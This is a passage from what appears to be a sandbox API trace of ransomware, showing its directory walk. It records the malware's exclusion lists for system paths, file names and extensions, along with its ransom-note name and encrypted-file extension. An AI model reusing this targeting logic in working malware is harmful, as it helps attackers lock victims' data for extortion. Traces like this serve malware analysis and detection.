[0070.873] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0070.873] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0070.873] FindClose (in: hFindFile=0xec25b0 | out: hFindFile=0xec25b0) returned 1 [0070.873] GetProcessHeap () returned 0xe30000 [0070.873] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0070.873] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1028", cAlternateFileName="")) returned 1 [0070.873] StrCmpW (psz1="1028", psz2=".") returned 1 [0070.873] StrCmpW (psz1="1028", psz2="..") returned 1 [0070.873] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0070.873] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0070.873] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1028", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0070.873] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\system32\\") returned 0x0 [0070.873] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\syswow64\\") returned 0x0 [0070.873] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\system\\") returned 0x0 [0070.873] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\windows\\winsxs\\") returned 0x0 [0070.873] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\roaming\\") returned 0x0 [0070.873] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\local\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\appdata\\locallow\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\all users\\microsoft\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="\\inetpub\\logs\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\boot\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\perflogs\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\programdata\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\drivers\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\wsus\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\efstmpwp\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch=":\\$recycle.bin\\") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="crypt_detect") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="cryptolocker") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="ransomware") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\WINDOWS") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\Program Files (x86)") returned 0x0 [0070.874] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1028", lpSrch="C:\\Program Files") returned 0x0 [0070.874] GetProcessHeap () returned 0xe30000 [0070.874] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0070.874] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0070.874] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\*") returned="C:\\588bce7c90097ed212\\1028\\*" [0070.874] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0070.875] StrCmpW (psz1=".", psz2=".") returned 0 [0070.875] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.875] StrCmpW (psz1="..", psz2=".") returned 1 [0070.875] StrCmpW (psz1="..", psz2="..") returned 0 [0070.875] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0070.875] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0070.875] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0070.875] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0070.875] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0070.875] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned="C:\\588bce7c90097ed212\\1028\\eula.rtf" [0070.875] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0070.875] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0070.875] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0070.876] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0070.876] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0070.876] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0070.876] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0070.876] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.876] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0070.876] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0070.876] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0070.876] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0070.876] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0070.876] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0070.876] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0070.876] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0070.876] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0070.876] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0070.876] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0070.876] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0070.876] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0070.876] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" [0070.876] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0070.876] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0070.876] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0070.877] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0070.877] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.877] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0070.877] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0070.877] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0070.877] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0070.877] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0070.877] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0070.877] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0070.877] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0070.877] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0070.877] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0070.877] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0070.877] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0070.877] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0070.877] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" [0070.877] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0070.877] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0070.877] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0070.877] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0070.878] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0070.878] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0070.878] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0070.878] GetProcessHeap () returned 0xe30000 [0070.878] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0070.878] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1029", cAlternateFileName="")) returned 1 [0070.878] StrCmpW (psz1="1029", psz2=".") returned 1 [0070.878] StrCmpW (psz1="1029", psz2="..") returned 1 [0070.878] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0070.878] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0070.878] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1029", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\system32\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\syswow64\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\system\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\winsxs\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\roaming\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\local\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\locallow\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\all users\\microsoft\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\inetpub\\logs\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\boot\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\perflogs\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\programdata\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\drivers\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\wsus\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\efstmpwp\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\$recycle.bin\\") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="crypt_detect") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="cryptolocker") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="ransomware") returned 0x0 [0070.878] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\WINDOWS") returned 0x0 [0070.879] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\Program Files (x86)") returned 0x0 [0070.879] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\Program Files") returned 0x0 [0070.879] GetProcessHeap () returned 0xe30000 [0070.879] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0070.879] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0070.879] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\*") returned="C:\\588bce7c90097ed212\\1029\\*" [0070.879] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0071.067] StrCmpW (psz1=".", psz2=".") returned 0 [0071.067] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.067] StrCmpW (psz1="..", psz2=".") returned 1 [0071.067] StrCmpW (psz1="..", psz2="..") returned 0 [0071.067] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.067] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.067] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.067] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0071.067] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0071.067] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned="C:\\588bce7c90097ed212\\1029\\eula.rtf" [0071.067] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.067] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.067] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.068] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.068] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.068] StrStrIW 